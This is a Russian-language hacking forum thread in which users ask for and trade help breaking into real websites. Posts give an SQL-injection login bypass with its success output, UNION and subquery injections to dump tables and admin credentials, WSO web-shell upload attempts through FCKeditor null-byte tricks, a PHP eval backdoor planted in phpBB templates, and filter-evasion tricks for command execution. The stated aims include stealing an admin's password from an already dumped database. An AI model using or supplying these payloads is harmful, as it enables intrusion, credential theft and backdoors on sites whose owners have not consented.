Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    сорь, может не в тему но, слили БД сайта, админку найти не могу, в БД таюлици имеют префикс xpanel - в гугле ничего не могу найти про этот двиг, офф сайт уже давно в оффе, может кто что знает про етот двиг? где там админку можно найти?
     
  2. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    logsecurecash=1&login_name=' or 1#&login_pass=111111&x=31&y=13

    Вы зашли как: advaweb
    Баланс: 10 руб.
     
  3. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Стыдно, спасибо :)
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Потому что скобку забыл в запросе

    (select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar)+char(0x7а)+cast(email as nvarchar) from member where id=4)--
     
    _________________________
  5. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    Подскажите по поводу FCKeditor 2.5.1 Build 17566
    txt файлы спокойно льются, а вот php никак нехочет пробывал:
    1) Через /php/upload.php?Type=Media
    2) Грузил txt указывал в Current Folder: wso.php%00
    3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt
    Что посоветуете? других дыр нет есть еще CKEditor 3.2.1
    Двиг: Powered by cc Engine (китайский двиг)
    P.S>.htaccess так же не грузит
     
  6. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Подскажите в чем может быть проблема
    Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
    Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
    впиливаю код <?php eval(stripslashes($_REQUEST[c])); ?>
    Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
    Подскажите почему может не выполнятся пхпкод
    права в админке полные, мб можно еще какнить залить?
     
  7. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    пытаюсь отправить запросы для вывода данных хотя бы юзеров.
    то и дело выходят ошибки :
    Подскажите где взять список запросов?
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    а какой запрос вы делайте? покажите.
     
    _________________________
  9. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    ошибка :

    Как можно вывести названия таблиц?
    Очень надо вывести логин и пасс админа
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
     
    _________________________
  11. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Мне реально стыдно! я уже их перечитался!
    мне бы пароль админа содрать, или таблицы вывести с БД
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    так вставляй
    PHP:
    <!-- PHP --> phpinfo(); <!-- ENDPHP -->


    так а в чём собственно проблема?
     
  13. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    ни какого эффекта) ничего не выводит = \
    я уже пробовал так)
     
  14. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.
     
  15. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    он ему запрос дал и посоветовал мускуль подучить, чтоб он сам смог вывести таблицы, а ты тупо "умничаешь."
     
  16. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Делаю такой запрос
    1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true

    1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false

    Выдает
    Illegal mix of collations for operation 'UNION'

    Как быть?
     
  17. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Если не ошибаюсь, то такая ошибка обычно связана с проблемами в кодировке. И, судя по всему, в ошибке в вашем случае явно не указана нужная. Если ошибаюсь то меня поправят.

    Немного пищи для размышления:

    cast(version()+as+binary)
    convert(version(),binary)
    convert(version()+using+latin1)
    convert(version()+using+binary)
    aes_decrypt(aes_encrypt(version(),1),1)
    unhex(hex(version()))

    Попробуйте при выводе нужной информации использовать приведенные выше примеры.
     
    1 person likes this.
  18. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    ребят,хелп ми,плз

    есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....

    что можно сделать в данном случае?
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    print(`я консольная команда`);
     
    _________________________
  20. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    не совсем понял...)
    как,к примеру,вывести результат system('ls -la')? (экранируются кавычки и режутся заглавные)
     
Thread Status:
Not open for further replies.